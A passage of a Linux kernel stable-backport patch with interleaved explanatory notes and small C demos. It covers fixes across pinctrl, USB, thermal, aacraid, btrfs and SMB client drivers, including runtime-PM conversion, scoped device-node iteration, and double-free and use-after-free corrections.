++		return PTR_ERR(provider);
+ 	}
++
++	pm_runtime_set_active(gtr_dev->dev);
++	pm_runtime_enable(gtr_dev->dev);
++
++	ret = pm_runtime_resume_and_get(gtr_dev->dev);
++	if (ret < 0) {
++		pm_runtime_disable(gtr_dev->dev);
++		return ret;
++	}
++
++	gtr_dev->saved_regs = devm_kmalloc(gtr_dev->dev,
++					   sizeof(save_reg_address),
++					   GFP_KERNEL);
++	if (!gtr_dev->saved_regs)
++		return -ENOMEM;
++
+ 	return 0;
++}
+ 
+-err_clk_put:
+-	for (i = 0; i < ARRAY_SIZE(gtr_dev->clk); i++)
+-		clk_disable_unprepare(gtr_dev->clk[i]);
++static int xpsgtr_remove(struct platform_device *pdev)
++{
++	struct xpsgtr_dev *gtr_dev = platform_get_drvdata(pdev);
+ 
+-	return ret;
++	pm_runtime_disable(gtr_dev->dev);
++	pm_runtime_put_noidle(gtr_dev->dev);
++	pm_runtime_set_suspended(gtr_dev->dev);
++
++	return 0;
+ }
+ 
+ static const struct of_device_id xpsgtr_of_match[] = {
+@@ -1024,10 +1071,11 @@ MODULE_DEVICE_TABLE(of, xpsgtr_of_match);
+ 
+ static struct platform_driver xpsgtr_driver = {
+ 	.probe = xpsgtr_probe,
++	.remove	= xpsgtr_remove,
+ 	.driver = {
+ 		.name = "xilinx-psgtr",
+ 		.of_match_table	= xpsgtr_of_match,
+-		.pm =  &xpsgtr_pm_ops,
++		.pm =  pm_ptr(&xpsgtr_pm_ops),
+ 	},
+ };
+ 
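The phy-zynqmp rework replaces SET_SYSTEM_SLEEP_PM_OPS with DEFINE_RUNTIME_DEV_PM_OPS plus pm_ptr(), so one suspend/resume pair serves runtime PM and, via pm_runtime_force_suspend()/pm_runtime_force_resume(), system sleep as well. The shape of the conversion as a minimal skeleton (the foo_* names are placeholders, not from the patch):

#include <linux/platform_device.h>
#include <linux/pm_runtime.h>

static int foo_runtime_suspend(struct device *dev)
{
	/* save context, gate clocks */
	return 0;
}

static int foo_runtime_resume(struct device *dev)
{
	/* restore context */
	return 0;
}

/* Also wires system sleep to pm_runtime_force_{suspend,resume}() */
static DEFINE_RUNTIME_DEV_PM_OPS(foo_pm_ops, foo_runtime_suspend,
				 foo_runtime_resume, NULL);

static struct platform_driver foo_driver = {
	.driver = {
		.name = "foo",
		.pm = pm_ptr(&foo_pm_ops), /* drops to NULL if !CONFIG_PM */
	},
};
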
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c b/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c
+index b7921b59eb7b1..54301fbba524a 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c
+@@ -709,32 +709,35 @@ static int mtk_pinconf_bias_set_rsel(struct mtk_pinctrl *hw,
+ {
+ 	int err, rsel_val;
+ 
+-	if (!pullup && arg == MTK_DISABLE)
+-		return 0;
+-
+ 	if (hw->rsel_si_unit) {
+ 		/* find pin rsel_index from pin_rsel array*/
+ 		err = mtk_hw_pin_rsel_lookup(hw, desc, pullup, arg, &rsel_val);
+ 		if (err)
+-			goto out;
++			return err;
+ 	} else {
+-		if (arg < MTK_PULL_SET_RSEL_000 ||
+-		    arg > MTK_PULL_SET_RSEL_111) {
+-			err = -EINVAL;
+-			goto out;
+-		}
++		if (arg < MTK_PULL_SET_RSEL_000 || arg > MTK_PULL_SET_RSEL_111)
++			return -EINVAL;
+ 
+ 		rsel_val = arg - MTK_PULL_SET_RSEL_000;
+ 	}
+ 
+-	err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_RSEL, rsel_val);
+-	if (err)
+-		goto out;
++	return mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_RSEL, rsel_val);
++}
+ 
+-	err = mtk_pinconf_bias_set_pu_pd(hw, desc, pullup, MTK_ENABLE);
++static int mtk_pinconf_bias_set_pu_pd_rsel(struct mtk_pinctrl *hw,
++					   const struct mtk_pin_desc *desc,
++					   u32 pullup, u32 arg)
++{
++	u32 enable = arg == MTK_DISABLE ? MTK_DISABLE : MTK_ENABLE;
++	int err;
+ 
+-out:
+-	return err;
++	if (arg != MTK_DISABLE) {
++		err = mtk_pinconf_bias_set_rsel(hw, desc, pullup, arg);
++		if (err)
++			return err;
++	}
++
++	return mtk_pinconf_bias_set_pu_pd(hw, desc, pullup, enable);
+ }
+ 
+ int mtk_pinconf_bias_set_combo(struct mtk_pinctrl *hw,
+@@ -750,22 +753,22 @@ int mtk_pinconf_bias_set_combo(struct mtk_pinctrl *hw,
+ 		try_all_type = MTK_PULL_TYPE_MASK;
+ 
+ 	if (try_all_type & MTK_PULL_RSEL_TYPE) {
+-		err = mtk_pinconf_bias_set_rsel(hw, desc, pullup, arg);
++		err = mtk_pinconf_bias_set_pu_pd_rsel(hw, desc, pullup, arg);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PU_PD_TYPE) {
+ 		err = mtk_pinconf_bias_set_pu_pd(hw, desc, pullup, arg);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PULLSEL_TYPE) {
+ 		err = mtk_pinconf_bias_set_pullsel_pullen(hw, desc,
+ 							  pullup, arg);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PUPD_R1R0_TYPE)
+@@ -803,9 +806,9 @@ static int mtk_rsel_get_si_unit(struct mtk_pinctrl *hw,
+ 	return 0;
+ }
+ 
+-static int mtk_pinconf_bias_get_rsel(struct mtk_pinctrl *hw,
+-				     const struct mtk_pin_desc *desc,
+-				     u32 *pullup, u32 *enable)
++static int mtk_pinconf_bias_get_pu_pd_rsel(struct mtk_pinctrl *hw,
++					   const struct mtk_pin_desc *desc,
++					   u32 *pullup, u32 *enable)
+ {
+ 	int pu, pd, rsel, err;
+ 
+@@ -939,22 +942,22 @@ int mtk_pinconf_bias_get_combo(struct mtk_pinctrl *hw,
+ 		try_all_type = MTK_PULL_TYPE_MASK;
+ 
+ 	if (try_all_type & MTK_PULL_RSEL_TYPE) {
+-		err = mtk_pinconf_bias_get_rsel(hw, desc, pullup, enable);
++		err = mtk_pinconf_bias_get_pu_pd_rsel(hw, desc, pullup, enable);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PU_PD_TYPE) {
+ 		err = mtk_pinconf_bias_get_pu_pd(hw, desc, pullup, enable);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PULLSEL_TYPE) {
+ 		err = mtk_pinconf_bias_get_pullsel_pullen(hw, desc,
+ 							  pullup, enable);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PUPD_R1R0_TYPE)
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 6d140a60888c2..ca5a01c11ce60 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -3803,7 +3803,7 @@ static struct rockchip_pin_bank rk3328_pin_banks[] = {
+ 	PIN_BANK_IOMUX_FLAGS(0, 32, "gpio0", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(1, 32, "gpio1", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(2, 32, "gpio2", 0,
+-			     0,
++			     IOMUX_WIDTH_2BIT,
+ 			     IOMUX_WIDTH_3BIT,
+ 			     0),
+ 	PIN_BANK_IOMUX_FLAGS(3, 32, "gpio3",
+diff --git a/drivers/pinctrl/pinctrl-single.c b/drivers/pinctrl/pinctrl-single.c
+index cd23479f352a2..d32d5c5e99bcd 100644
+--- a/drivers/pinctrl/pinctrl-single.c
++++ b/drivers/pinctrl/pinctrl-single.c
+@@ -350,6 +350,8 @@ static int pcs_get_function(struct pinctrl_dev *pctldev, unsigned pin,
+ 		return -ENOTSUPP;
+ 	fselector = setting->func;
+ 	function = pinmux_generic_get_function(pctldev, fselector);
++	if (!function)
++		return -EINVAL;
+ 	*func = function->data;
+ 	if (!(*func)) {
+ 		dev_err(pcs->dev, "%s could not find function%i\n",
+diff --git a/drivers/scsi/aacraid/comminit.c b/drivers/scsi/aacraid/comminit.c
+index bd99c5492b7d4..0f64b02443037 100644
+--- a/drivers/scsi/aacraid/comminit.c
++++ b/drivers/scsi/aacraid/comminit.c
+@@ -642,6 +642,7 @@ struct aac_dev *aac_init_adapter(struct aac_dev *dev)
+ 
+ 	if (aac_comm_init(dev)<0){
+ 		kfree(dev->queues);
++		dev->queues = NULL;
+ 		return NULL;
+ 	}
+ 	/*
+@@ -649,6 +650,7 @@ struct aac_dev *aac_init_adapter(struct aac_dev *dev)
+ 	 */
+ 	if (aac_fib_setup(dev) < 0) {
+ 		kfree(dev->queues);
++		dev->queues = NULL;
+ 		return NULL;
+ 	}
+ 		
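The aacraid change pairs each kfree(dev->queues) with dev->queues = NULL because later teardown paths may free the same pointer again; kfree(NULL) is a no-op, so clearing the pointer turns a potential double free into a harmless call. The same defensive idiom in plain C:

#include <stdlib.h>

struct adapter {
	int *queues;
};

/* Safe to call repeatedly: free(NULL), like kfree(NULL), does
 * nothing, so a second call after clearing is a no-op.
 */
static void adapter_teardown(struct adapter *a)
{
	free(a->queues);
	a->queues = NULL;
}
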
+diff --git a/drivers/soc/qcom/cmd-db.c b/drivers/soc/qcom/cmd-db.c
+index 2a7d089ec7270..81ddbcd253d92 100644
+--- a/drivers/soc/qcom/cmd-db.c
++++ b/drivers/soc/qcom/cmd-db.c
+@@ -354,7 +354,7 @@ static int cmd_db_dev_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	cmd_db_header = memremap(rmem->base, rmem->size, MEMREMAP_WB);
++	cmd_db_header = memremap(rmem->base, rmem->size, MEMREMAP_WC);
+ 	if (!cmd_db_header) {
+ 		ret = -ENOMEM;
+ 		cmd_db_header = NULL;
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index 2624441d2fa92..2a245f3b7738f 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -1272,18 +1272,18 @@ struct sdw_dpn_prop *sdw_get_slave_dpn_prop(struct sdw_slave *slave,
+ 					    unsigned int port_num)
+ {
+ 	struct sdw_dpn_prop *dpn_prop;
+-	u8 num_ports;
++	unsigned long mask;
+ 	int i;
+ 
+ 	if (direction == SDW_DATA_DIR_TX) {
+-		num_ports = hweight32(slave->prop.source_ports);
++		mask = slave->prop.source_ports;
+ 		dpn_prop = slave->prop.src_dpn_prop;
+ 	} else {
+-		num_ports = hweight32(slave->prop.sink_ports);
++		mask = slave->prop.sink_ports;
+ 		dpn_prop = slave->prop.sink_dpn_prop;
+ 	}
+ 
+-	for (i = 0; i < num_ports; i++) {
++	for_each_set_bit(i, &mask, 32) {
+ 		if (dpn_prop[i].num == port_num)
+ 			return &dpn_prop[i];
+ 	}
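The stream.c fix matters when a peripheral's port mask is sparse: the old loop visited array indices 0..hweight32(mask)-1, but the dpn_prop[] entries can sit at the bit positions of the actual port numbers, so ports past the first gap were never matched. for_each_set_bit() walks exactly the set positions. A userspace rendition of the difference (mask value chosen for the demo):

#include <stdio.h>

int main(void)
{
	unsigned long mask = 0x0a; /* ports 1 and 3; hweight = 2 */
	int i;

	/* an index-count loop would scan slots 0 and 1 and miss port 3 */
	for (i = 0; i < 32; i++)
		if (mask & (1UL << i))
			printf("port %d\n", i); /* prints 1, then 3 */
	return 0;
}
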
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index 202dce0d2e309..323c8cd171485 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -235,7 +235,7 @@ static int thermal_of_populate_trip(struct device_node *np,
+ static struct thermal_trip *thermal_of_trips_init(struct device_node *np, int *ntrips)
+ {
+ 	struct thermal_trip *tt;
+-	struct device_node *trips, *trip;
++	struct device_node *trips;
+ 	int ret, count;
+ 
+ 	trips = of_get_child_by_name(np, "trips");
+@@ -260,7 +260,7 @@ static struct thermal_trip *thermal_of_trips_init(struct device_node *np, int *n
+ 	*ntrips = count;
+ 
+ 	count = 0;
+-	for_each_child_of_node(trips, trip) {
++	for_each_child_of_node_scoped(trips, trip) {
+ 		ret = thermal_of_populate_trip(trip, &tt[count++]);
+ 		if (ret)
+ 			goto out_kfree;
+@@ -294,14 +294,14 @@ static struct device_node *of_thermal_zone_find(struct device_node *sensor, int
+ 	 * Search for each thermal zone, a defined sensor
+ 	 * corresponding to the one passed as parameter
+ 	 */
+-	for_each_available_child_of_node(np, tz) {
++	for_each_available_child_of_node_scoped(np, child) {
+ 
+ 		int count, i;
+ 
+-		count = of_count_phandle_with_args(tz, "thermal-sensors",
++		count = of_count_phandle_with_args(child, "thermal-sensors",
+ 						   "#thermal-sensor-cells");
+ 		if (count <= 0) {
+-			pr_err("%pOFn: missing thermal sensor\n", tz);
++			pr_err("%pOFn: missing thermal sensor\n", child);
+ 			tz = ERR_PTR(-EINVAL);
+ 			goto out;
+ 		}
+@@ -310,18 +310,19 @@ static struct device_node *of_thermal_zone_find(struct device_node *sensor, int
+ 
+ 			int ret;
+ 
+-			ret = of_parse_phandle_with_args(tz, "thermal-sensors",
++			ret = of_parse_phandle_with_args(child, "thermal-sensors",
+ 							 "#thermal-sensor-cells",
+ 							 i, &sensor_specs);
+ 			if (ret < 0) {
+-				pr_err("%pOFn: Failed to read thermal-sensors cells: %d\n", tz, ret);
++				pr_err("%pOFn: Failed to read thermal-sensors cells: %d\n", child, ret);
+ 				tz = ERR_PTR(ret);
+ 				goto out;
+ 			}
+ 
+ 			if ((sensor == sensor_specs.np) && id == (sensor_specs.args_count ?
+ 								  sensor_specs.args[0] : 0)) {
+-				pr_debug("sensor %pOFn id=%d belongs to %pOFn\n", sensor, id, tz);
++				pr_debug("sensor %pOFn id=%d belongs to %pOFn\n", sensor, id, child);
++				tz = no_free_ptr(child);
+ 				goto out;
+ 			}
+ 		}
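for_each_child_of_node_scoped() — added to of.h further down in this patch — declares the iterator with __free(device_node), so of_node_put() runs automatically whenever the loop variable goes out of scope, including on the early 'goto out' error paths; no_free_ptr() is the escape hatch that transfers the reference out of the loop, which is what 'tz = no_free_ptr(child)' does above. The GCC/Clang cleanup attribute underneath, reduced to a runnable userspace demo (free_str and the strdup payload are demo-only):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static void free_str(char **p)
{
	free(*p); /* invoked automatically when *p leaves scope */
}

int main(void)
{
	int i;

	for (i = 0; i < 3; i++) {
		char *name __attribute__((cleanup(free_str))) =
			strdup("child");

		printf("%d: %s\n", i, name);
		if (i == 1)
			break; /* name is still freed on this exit */
	}
	return 0;
}
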
+diff --git a/drivers/usb/cdns3/cdnsp-gadget.h b/drivers/usb/cdns3/cdnsp-gadget.h
+index f740fa6089d85..a61aef0dc273c 100644
+--- a/drivers/usb/cdns3/cdnsp-gadget.h
++++ b/drivers/usb/cdns3/cdnsp-gadget.h
+@@ -811,6 +811,7 @@ struct cdnsp_stream_info {
+  *        generate Missed Service Error Event.
+  *        Set skip flag when receive a Missed Service Error Event and
+  *        process the missed tds on the endpoint ring.
++ * @wa1_nop_trb: hold pointer to NOP trb.
+  */
+ struct cdnsp_ep {
+ 	struct usb_ep endpoint;
+@@ -838,6 +839,8 @@ struct cdnsp_ep {
+ #define EP_UNCONFIGURED		BIT(7)
+ 
+ 	bool skip;
++	union cdnsp_trb	 *wa1_nop_trb;
++
+ };
+ 
+ /**
+diff --git a/drivers/usb/cdns3/cdnsp-ring.c b/drivers/usb/cdns3/cdnsp-ring.c
+index 8a2cc0405a4ad..04e8db773a825 100644
+--- a/drivers/usb/cdns3/cdnsp-ring.c
++++ b/drivers/usb/cdns3/cdnsp-ring.c
+@@ -402,7 +402,7 @@ static u64 cdnsp_get_hw_deq(struct cdnsp_device *pdev,
+ 	struct cdnsp_stream_ctx *st_ctx;
+ 	struct cdnsp_ep *pep;
+ 
+-	pep = &pdev->eps[stream_id];
++	pep = &pdev->eps[ep_index];
+ 
+ 	if (pep->ep_state & EP_HAS_STREAMS) {
+ 		st_ctx = &pep->stream_info.stream_ctx_array[stream_id];
+@@ -1902,6 +1902,23 @@ int cdnsp_queue_bulk_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 	if (ret)
+ 		return ret;
+ 
++	/*
++	 * workaround 1: STOP EP command on LINK TRB with TC bit set to 1
++	 * causes that internal cycle bit can have incorrect state after
++	 * command complete. In consequence empty transfer ring can be
++	 * incorrectly detected when EP is resumed.
++	 * NOP TRB before LINK TRB avoid such scenario. STOP EP command is
++	 * then on NOP TRB and internal cycle bit is not changed and have
++	 * correct value.
++	 */
++	if (pep->wa1_nop_trb) {
++		field = le32_to_cpu(pep->wa1_nop_trb->trans_event.flags);
++		field ^= TRB_CYCLE;
++
++		pep->wa1_nop_trb->trans_event.flags = cpu_to_le32(field);
++		pep->wa1_nop_trb = NULL;
++	}
++
+ 	/*
+ 	 * Don't give the first TRB to the hardware (by toggling the cycle bit)
+ 	 * until we've finished creating all the other TRBs. The ring's cycle
+@@ -1997,6 +2014,17 @@ int cdnsp_queue_bulk_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 		send_addr = addr;
+ 	}
+ 
++	if (cdnsp_trb_is_link(ring->enqueue + 1)) {
++		field = TRB_TYPE(TRB_TR_NOOP) | TRB_IOC;
++		if (!ring->cycle_state)
++			field |= TRB_CYCLE;
++
++		pep->wa1_nop_trb = ring->enqueue;
++
++		cdnsp_queue_trb(pdev, ring, 0, 0x0, 0x0,
++				TRB_INTR_TARGET(0), field);
++	}
++
+ 	cdnsp_check_trb_math(preq, enqd_len);
+ 	ret = cdnsp_giveback_first_trb(pdev, pep, preq->request.stream_id,
+ 				       start_cycle, start_trb);
+diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c
+index 2a7eea4e251a1..98511acfffe4e 100644
+--- a/drivers/usb/class/cdc-acm.c
++++ b/drivers/usb/class/cdc-acm.c
+@@ -1737,6 +1737,9 @@ static const struct usb_device_id acm_ids[] = {
+ 	{ USB_DEVICE(0x11ca, 0x0201), /* VeriFone Mx870 Gadget Serial */
+ 	.driver_info = SINGLE_RX_URB,
+ 	},
++	{ USB_DEVICE(0x1901, 0x0006), /* GE Healthcare Patient Monitor UI Controller */
++	.driver_info = DISABLE_ECHO, /* DISABLE ECHO in termios flag */
++	},
+ 	{ USB_DEVICE(0x1965, 0x0018), /* Uniden UBC125XLT */
+ 	.driver_info = NO_UNION_NORMAL, /* has no union descriptor */
+ 	},
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index 5f1e07341f363..4fd1bfd524490 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -670,6 +670,7 @@ static int add_power_attributes(struct device *dev)
+ 
+ static void remove_power_attributes(struct device *dev)
+ {
++	sysfs_unmerge_group(&dev->kobj, &usb3_hardware_lpm_attr_group);
+ 	sysfs_unmerge_group(&dev->kobj, &usb2_hardware_lpm_attr_group);
+ 	sysfs_unmerge_group(&dev->kobj, &power_attr_group);
+ }
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 4964fa7419efa..5b761a2a87a7f 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -553,9 +553,17 @@ int dwc3_event_buffers_setup(struct dwc3 *dwc)
+ void dwc3_event_buffers_cleanup(struct dwc3 *dwc)
+ {
+ 	struct dwc3_event_buffer	*evt;
++	u32				reg;
+ 
+ 	if (!dwc->ev_buf)
+ 		return;
++	/*
++	 * Exynos platforms may not be able to access event buffer if the
++	 * controller failed to halt on dwc3_core_exit().
++	 */
++	reg = dwc3_readl(dwc->regs, DWC3_DSTS);
++	if (!(reg & DWC3_DSTS_DEVCTRLHLT))
++		return;
+ 
+ 	evt = dwc->ev_buf;
+ 
+diff --git a/drivers/usb/dwc3/dwc3-omap.c b/drivers/usb/dwc3/dwc3-omap.c
+index efaf0db595f46..6b59bbb22da49 100644
+--- a/drivers/usb/dwc3/dwc3-omap.c
++++ b/drivers/usb/dwc3/dwc3-omap.c
+@@ -522,11 +522,13 @@ static int dwc3_omap_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(dev, "failed to request IRQ #%d --> %d\n",
+ 			omap->irq, ret);
+-		goto err1;
++		goto err2;
+ 	}
+ 	dwc3_omap_enable_irqs(omap);
+ 	return 0;
+ 
++err2:
++	of_platform_depopulate(dev);
+ err1:
+ 	pm_runtime_put_sync(dev);
+ 	pm_runtime_disable(dev);
+diff --git a/drivers/usb/dwc3/dwc3-st.c b/drivers/usb/dwc3/dwc3-st.c
+index fea5290de83fb..20133fbb91473 100644
+--- a/drivers/usb/dwc3/dwc3-st.c
++++ b/drivers/usb/dwc3/dwc3-st.c
+@@ -219,10 +219,8 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	dwc3_data->regmap = regmap;
+ 
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "syscfg-reg");
+-	if (!res) {
+-		ret = -ENXIO;
+-		goto undo_platform_dev_alloc;
+-	}
++	if (!res)
++		return -ENXIO;
+ 
+ 	dwc3_data->syscfg_reg_off = res->start;
+ 
+@@ -233,8 +231,7 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 		devm_reset_control_get_exclusive(dev, "powerdown");
+ 	if (IS_ERR(dwc3_data->rstc_pwrdn)) {
+ 		dev_err(&pdev->dev, "could not get power controller\n");
+-		ret = PTR_ERR(dwc3_data->rstc_pwrdn);
+-		goto undo_platform_dev_alloc;
++		return PTR_ERR(dwc3_data->rstc_pwrdn);
+ 	}
+ 
+ 	/* Manage PowerDown */
+@@ -269,7 +266,7 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	if (!child_pdev) {
+ 		dev_err(dev, "failed to find dwc3 core device\n");
+ 		ret = -ENODEV;
+-		goto err_node_put;
++		goto depopulate;
+ 	}
+ 
+ 	dwc3_data->dr_mode = usb_get_dr_mode(&child_pdev->dev);
+@@ -285,6 +282,7 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	ret = st_dwc3_drd_init(dwc3_data);
+ 	if (ret) {
+ 		dev_err(dev, "drd initialisation failed\n");
++		of_platform_depopulate(dev);
+ 		goto undo_softreset;
+ 	}
+ 
+@@ -294,14 +292,14 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, dwc3_data);
+ 	return 0;
+ 
++depopulate:
++	of_platform_depopulate(dev);
+ err_node_put:
+ 	of_node_put(child);
+ undo_softreset:
+ 	reset_control_assert(dwc3_data->rstc_rst);
+ undo_powerdown:
+ 	reset_control_assert(dwc3_data->rstc_pwrdn);
+-undo_platform_dev_alloc:
+-	platform_device_put(pdev);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index cb0eb7fd25426..d34458f11d825 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -619,6 +619,8 @@ static void option_instat_callback(struct urb *urb);
+ 
+ /* MeiG Smart Technology products */
+ #define MEIGSMART_VENDOR_ID			0x2dee
++/* MeiG Smart SRM825L based on Qualcomm 315 */
++#define MEIGSMART_PRODUCT_SRM825L		0x4d22
+ /* MeiG Smart SLM320 based on UNISOC UIS8910 */
+ #define MEIGSMART_PRODUCT_SLM320		0x4d41
+ 
+@@ -2366,6 +2368,9 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, LUAT_PRODUCT_AIR720U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SLM320, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SRM825L, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SRM825L, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SRM825L, 0xff, 0xff, 0x60) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index bb77f646366a5..013f61bbf28f8 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -2397,7 +2397,7 @@ static int tcpm_register_source_caps(struct tcpm_port *port)
+ {
+ 	struct usb_power_delivery_desc desc = { port->negotiated_rev };
+ 	struct usb_power_delivery_capabilities_desc caps = { };
+-	struct usb_power_delivery_capabilities *cap;
++	struct usb_power_delivery_capabilities *cap = port->partner_source_caps;
+ 
+ 	if (!port->partner_pd)
+ 		port->partner_pd = usb_power_delivery_register(NULL, &desc);
+@@ -2407,6 +2407,11 @@ static int tcpm_register_source_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->source_caps, sizeof(u32) * port->nr_source_caps);
+ 	caps.role = TYPEC_SOURCE;
+ 
++	if (cap) {
++		usb_power_delivery_unregister_capabilities(cap);
++		port->partner_source_caps = NULL;
++	}
++
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+ 		return PTR_ERR(cap);
+@@ -2420,7 +2425,7 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ {
+ 	struct usb_power_delivery_desc desc = { port->negotiated_rev };
+ 	struct usb_power_delivery_capabilities_desc caps = { };
+-	struct usb_power_delivery_capabilities *cap = port->partner_source_caps;
++	struct usb_power_delivery_capabilities *cap;
+ 
+ 	if (!port->partner_pd)
+ 		port->partner_pd = usb_power_delivery_register(NULL, &desc);
+@@ -2430,11 +2435,6 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->sink_caps, sizeof(u32) * port->nr_sink_caps);
+ 	caps.role = TYPEC_SINK;
+ 
+-	if (cap) {
+-		usb_power_delivery_unregister_capabilities(cap);
+-		port->partner_source_caps = NULL;
+-	}
+-
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+ 		return PTR_ERR(cap);
+diff --git a/drivers/video/fbdev/offb.c b/drivers/video/fbdev/offb.c
+index 6f0a9851b0924..ea232395e226f 100644
+--- a/drivers/video/fbdev/offb.c
++++ b/drivers/video/fbdev/offb.c
+@@ -27,6 +27,7 @@
+ #include <linux/ioport.h>
+ #include <linux/pci.h>
+ #include <linux/platform_device.h>
++#include <linux/cleanup.h>
+ #include <asm/io.h>
+ 
+ #ifdef CONFIG_PPC32
+diff --git a/fs/btrfs/compression.c b/fs/btrfs/compression.c
+index e6635fe700678..cb56ac8b925e6 100644
+--- a/fs/btrfs/compression.c
++++ b/fs/btrfs/compression.c
+@@ -613,6 +613,7 @@ static noinline int add_ra_bio_pages(struct inode *inode,
+ 			put_page(page);
+ 			break;
+ 		}
++		add_size = min(em->start + em->len, page_end + 1) - cur;
+ 		free_extent_map(em);
+ 
+ 		if (page->index == end_index) {
+@@ -625,7 +626,6 @@ static noinline int add_ra_bio_pages(struct inode *inode,
+ 			}
+ 		}
+ 
+-		add_size = min(em->start + em->len, page_end + 1) - cur;
+ 		ret = bio_add_page(cb->orig_bio, page, add_size, offset_in_page(cur));
+ 		if (ret != add_size) {
+ 			unlock_extent(tree, cur, page_end, NULL);
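
[The btrfs reorder above is a use-after-free fix: add_size is derived from em->start and em->len, so it has to be computed before free_extent_map() releases the extent map, not after. The rule in isolation, using the names from the hunk:

    add_size = min(em->start + em->len, page_end + 1) - cur;  /* read first */
    free_extent_map(em);                                      /* then release */
    /* any em->start / em->len access below this line is a use-after-free */
]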
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index f3b066b442807..59bb9653615e8 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -3745,6 +3745,8 @@ static int try_flush_qgroup(struct btrfs_root *root)
+ 		return 0;
+ 	}
+ 
++	btrfs_run_delayed_iputs(root->fs_info);
++	btrfs_wait_on_delayed_iputs(root->fs_info);
+ 	ret = btrfs_start_delalloc_snapshot(root, true);
+ 	if (ret < 0)
+ 		goto out;
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index fad4b5dcfbd5a..992ac7d20e5eb 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -4184,7 +4184,7 @@ smb2_new_read_req(void **buf, unsigned int *total_len,
+ 	 * If we want to do a RDMA write, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of read request
+ 	 */
+-	if (smb3_use_rdma_offload(io_parms)) {
++	if (rdata && smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+diff --git a/include/linux/of.h b/include/linux/of.h
